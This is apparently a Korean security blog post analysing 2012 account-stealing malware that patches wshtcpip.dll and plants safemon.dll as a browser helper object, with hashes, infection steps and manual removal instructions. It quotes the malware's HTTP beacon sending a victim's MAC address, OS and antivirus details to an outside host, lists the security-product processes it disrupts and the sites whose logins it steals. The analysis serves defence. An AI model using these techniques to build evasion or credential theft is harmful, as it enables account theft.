울지않는벌새 : Security, Movie & Society

wshtcpip.dll + safemon.dll 파일을 이용한 계정 정보 수집 악성코드 주의 (2012.2.4)

벌새::Analysis
이번 주말을 기점으로 중국발 계정 정보 수집 목적의 악성코드가 wshtcpip.dll 시스템 파일을 패치하는 방식으로 새롭게 변경이 이루어져서 유포가 이루어지고 있는 것이 확인되고 있습니다.

  version.dll + safemon.dll 파일을 이용한 계정 정보 수집 악성코드 주의 (2012.1.17)

이는 기존의 version.dll + safemon.dll 유포 방식에서 변화를 준 형태로 이전에 작성한 분석 내용을 함께 참고하시기 바랍니다.

MD5 : 0b14dfd82a538cf8933435397dbc4925

이번에 사용된 "C:\WINDOWS\system32\wshtcpip.dll" 시스템 파일은 "Windows Sockets Helper DLL" 기능을 하며, 보통 외부 네트워크와 연결된 프로세스에 추가되어 동작하는 것으로 판단됩니다.

실제로 감염되지 않은 정상적인 시스템 환경에서 wshtcpip.dll 시스템 파일이 추가된 프로세스 정보를 살펴보면 Internet Explorer 웹 브라우저(iexplore.exe), 네이버 백신(Naver Vaccine) 등 다양한 프로세스에 추가되어 있는 것을 확인할 수 있습니다.

현재 해당 악성코드가 유포되는 언론 사이트, 커뮤니티 사이트 등에 접속하는 사용자 중에서 취약점이 노출된 Adobe Flash Player, Oracle JRE 구 버전을 사용할 경우 그림과 같이 Flash 오류창 또는 Java Applet이 동작하는 모습을 통해 감염되는 모습을 확인할 수 있습니다.

이를 통해 최종적으로 감염시키는 실행 파일(MD5 : c752fcd1e8767802012c1aacd2effe5c)에 대하여 avast! 보안 제품에서는 Win32:FrePack [Cryp] (VirusTotal : 17/43), 안철수연구소(AhnLab) V3 보안 제품에서는 ASD.Prevention 진단명으로 진단되고 있습니다.
GET /2/get.asp?mac=1A1B ~(생략)~ 2047&ver=winxp%20Professional&avs=(V3)&os=NO. HTTP/1.1
User-Agent: Google page
Host: get.trowew.com
Cache-Control: no-cache

※ 네이버 백신(Naver Vaccine)은 체크하지 않은 상태(unknow)로 전송됩니다.
감염 과정에서 사용자 PC의 Mac Address, OS 종류, 설치된 보안 제품 체크를 통한 정보가 외부로 전송이 이루어지고 있는 것을 확인할 수 있습니다.

테스트에서는 AhnLab V3 보안 제품의 경우 자체 보호 기능이 활성화된 경우에도 최종 실행 파일을 진단하지 못할 경우에는 백신이 종료되는 현상이 확인되었습니다.

감염된 이후 AhnLab V3 Lite 보안 제품을 실행하면 정상적으로 실행은 되지만, 최신 업데이트를 실행할 경우 최신 엔진으로 업데이트가 이루어지지 않는 것을 확인할 수 있습니다.

최종 실행 파일을 통한 감염 과정을 간단하게 살펴보면 ① "C:\WINDOWS\system32\safemon.dll" 파일을 생성하여 브라우저 도우미 개체(BHO)에 자신을 등록하며 ② 악성 wshtcpip.dll 파일을 생성하기 위한 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\2012(월일시분초).dll" 파일을 생성합니다.

"C:\WINDOWS\system32\wshtcpip.dll" 시스템 파일을 백업하여 "C:\WINDOWS\system32\wshtcpxp.dll" 파일을 생성하며 ④ wshtcpip.dll 시스템 파일은 "C:\WINDOWS\system32\2012(월일시분초).dll" 파일로 이름을 변경합니다.

⑤ 앞서 생성되었던 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\2012(월일시분초).dll" 파일을 "C:\WINDOWS\system32\wshtcpip.dll" 파일로 패치하여 악성 시스템 파일로 변조한 후 ⑥ "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\ahn.bat" 배치 파일을 생성하여 감염을 시킨 최종 파일과 자신(ahn.bat)을 삭제 처리합니다.

[생성 / 변경 파일 및 진단 정보]

C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\20122415352.dll :: 숨김(H) 속성, 악성 wshtcpip.dll 백업 파일
 - MD5 : 7e1ecab4bd463733c1d761d2bb4cdc4c
 - Kaspersky : Trojan-GameThief.Win32.OnLineGames.adztc (VirusTotal : 14/43)
※ 해당 파일은 "2012(월일시분초).dll" 형태입니다.

C:\WINDOWS\system32\20122415352.dll :: wshtcpip.dll 백업 파일(정상 파일)
※ 해당 파일은 "2012(월일시분초).dll" 형태입니다.

C:\WINDOWS\system32\safemon.dll :: BHO 등록 파일
 - MD5 : 7678d7d1545edf36b611aabd98d98c81
 - Kaspersky : Trojan-GameThief.Win32.Magania.gken (VirusTotal : 6/43)

C:\WINDOWS\system32\wshtcpip.dll :: 변경 전 파일 크기(19,456 Bytes) / 변경 후 파일 크기(82,432 Bytes)
 - MD5 : 7e1ecab4bd463733c1d761d2bb4cdc4c
 - AhnLab V3 : Trojan/Win32.OnLineGames (VirusTotal : 14/43)

C:\WINDOWS\system32\wshtcpxp.dll :: wshtcpip.dll 백업 파일(정상 파일)

1. 악성 "C:\WINDOWS\system32\wshtcpip.dll" 시스템 파일

패치된 악성 wshtcpip.dll 시스템 파일의 Export Table을 살펴보면 백업된 wshtcpxp.dll 파일을 참조하여 동작하는 것을 확인할 수 있습니다.
  1. AhnLab MyFirewall : aosrts.exe
  2. AhnLab V3 : MUpdate2.exe, V3LTray.exe, V3LRun.exe, V3LSvc.exe, AhnFlt2k.sys, AhnFltNt.sys, AhnRec2k.sys, AhnRecNt.sys, AhnRghNt.sys, ahnsze.sys, v3core.sys, v3engine.sys
  3. AhnLab SiteGuard : SgRun.exe, Sgui.exe, SgSvc.exe
  4. avast! : AvastUI.exe, ashUpd.exe, AvastSvc.exe, avwsc.exe
  5. AVG : avgupd.exe, avgwdsvc.exe, avgfrw.exe, avgrsx.exe, avgnsx.exe, avgemc.exe, avgam.exe
  6. Avira AntiVir : avupgsvc.exe, avscan.exe, avguard.exe, avcenter.exe, avgnt.exe
  7. BitDefender : bdreinit.exe, bdagent.exe, seccenter.exe, vsserv.exe, updatesrv.exe
  8. ESET NOD32 : ekrn.exe, egui.exe
  9. Kaspersky : avp.exe
  10. McAfee : UdaterUI.exe, Mctray.exe, shstat.exe
  11. MSE : msseces.exe
  12. Norton : Navw32.exe, ccSvcHst.exe
  13. 네이버 백신(Naver Vaccine) : NaverAgent.exe
  14. 알약(ALYac) : AYAgent.aye, AYUpdSrv.aye, AYRTSrv.aye, EstRtw.sys

해당 악성 시스템 파일은 국내외 유명 보안 제품의 프로세스를 감시하여 정상적인 동작을 방해하는 기능이 포함되어 있는 것을 확인할 수 있습니다.

2. "C:\WINDOWS\system32\safemon.dll" 파일 기능

safemon.dll 악성 파일은 safemon Module 파일로 등록되어 있으며, 감염시 브라우저 도우미 개체(BHO)에 자신을 등록합니다.

이 과정에서 감염 전 사용자 PC에 등록된 BHO 정보가 존재할 경우 일괄적으로 삭제 처리하여 감염 후에는 자신만 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Browser Helper Objects"
레지스트리 값에 추가되는 동작을 확인할 수 있습니다.

 

[추가 기능 관리 : 도구 모음 및 확장 프로그램]

이름 : IEHlprObj Class
유형 : 브라우저 도우미 개체
CLSID : {D36F9CA2-788F-42DE-A627-9E6EF40D8475}
파일 : C:\WINDOWS\system32\safemon.dll

※ AhnLab V3 보안 제품에서는 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Browser Helper Objects\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}"
값에 대하여 Suspicious BHO 진단명으로 진단되고 있습니다.

이를 통해 safemon.dll 파일은 Internet Explorer 웹 브라우저가 실행될 경우 iexplore.exe 프로세스에 자신을 추가하여 다음과 같은 온라인 문화 상품권, 아이템 거래, 온라인 게임 사이트에 접속시 계정 정보를 수집하여 외부에 전송하는 동작을 합니다.

  1. happymoney.co.kr
  2. teencash.co.kr
  3. cultureland.co.kr
  4. booknlife.com
  5. capogames.net
  6. dragonnest.nexon.com
  7. elsword.nexon.com
  8. clubaudition.ndolfin.com
  9. netmarble.net
  10. itemmania.com
  11. itembay.com
  12. pmang.com
  13. aion.plaync.jp
  14. plaync.co.kr
  15. maplestory.nexon.com
  16. hangame.com
  17. fifaonline.pmang.com
  18. df.nexon.com
  19. baram.nexon.com

실제 틴캐시(TeenCash)에 접속하여 로그인을 시도할 경우 미국(USA)에 위치한 apple.swmlla.com(70.39.81.227) 서버로 계정 아이디(ID), 비밀번호가 전송되는 것을 확인할 수 있습니다.

그러므로 해당 악성코드에 감염된 사용자는 최대한 웹 사이트 로그인 동작을 하지 않은 상태에서 다음과 같은 절차에 따라 수동으로 문제를 해결해 보시기 바랍니다.(※ 반드시 순서를 준수하시기 바라며, 모든 프로그램을 종료한 상태에서 진행하시기 바랍니다.

(1) Internet Explorer 웹 브라우저를 실행하여 추가 기능 관리에 등록된 "IEHlprObj Class" 브라우저 도우미 개체(BHO) 항목을 선택하여 "사용 안 함"으로 변경하시기 바랍니다.(※ 변경 후에는 Internet Explorer 웹 브라우저를 종료하시기 바랍니다.)

(2) "C:\WINDOWS\system32\safemon.dll" 파일 확장자명을 변경하시기 바랍니다.(※ 예시 : safemon.dll-malware)

(3) 레지스트리 편집기(regedit)를 실행하여 다음의 레지스트리 값을 삭제하시기 바랍니다.

 

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\HOOK_DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\HOOK_ID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D36F9CA1-788F-42DE-A627-9E6EF40D8475}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{D36F9CA8-788F-42DE-A627-9E6EF40D8475}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Browser Helper Objects\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}

 

(4) "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\2012(월일시분초).dll" 파일을 삭제하시기 바랍니다.

(5) "C:\WINDOWS\system32\wshtcpip.dll" 파일 확장자명을 변경하시기 바랍니다.(※ 예시 : wshtcpip.dll-malware)

악성 wshtcpip.dll 파일의 확장자명을 변경한 후에는 윈도우 파일 보호(WFP) 기능을 통해 자동으로 wshtcpip.dll 파일이 복원되므로, Windows 탐색기 창을 종료한 후 다시 실행하여 해당 파일(wshtcpip.dll)이 생성되었는지 확인하시기 바랍니다.

만약 wshtcpip.dll 시스템 파일이 복원되지 않은 상태에서 시스템 재부팅을 할 경우 블루 스크린(BSoD) 발생 및 무한 재부팅으로 인해 시스템에 치명적 문제가 발생할 수 있습니다.

(6) 시스템 재부팅 후 다음의 파일을 찾아 수동으로 삭제하시기 바랍니다.

  1. C:\WINDOWS\system32\2012(월일시분초).dll
  2. C:\WINDOWS\system32\safemon.dll-malware
  3. C:\WINDOWS\system32\wshtcpip.dll-malware
  4. C:\WINDOWS\system32\wshtcpxp.dll

모든 절차가 완료된 후에는 반드시 유명 보안 제품을 이용하여 최신 업데이트를 한 후 정밀 검사를 통해 추가적인 악성 파일이 남아있는지 확인하시기 바랍니다.

해당 악성코드에 감염된 사용자는 자신의 PC가 Windows 보안 업데이트 미적용, Adobe Flash Player 구 버전 사용, Oracle JRE 구 버전 사용으로 인한 문제로 감염이 된 것이므로 반드시 최신 업데이트를 통해 보안 패치를 하시고 인터넷을 이용하시기 바랍니다.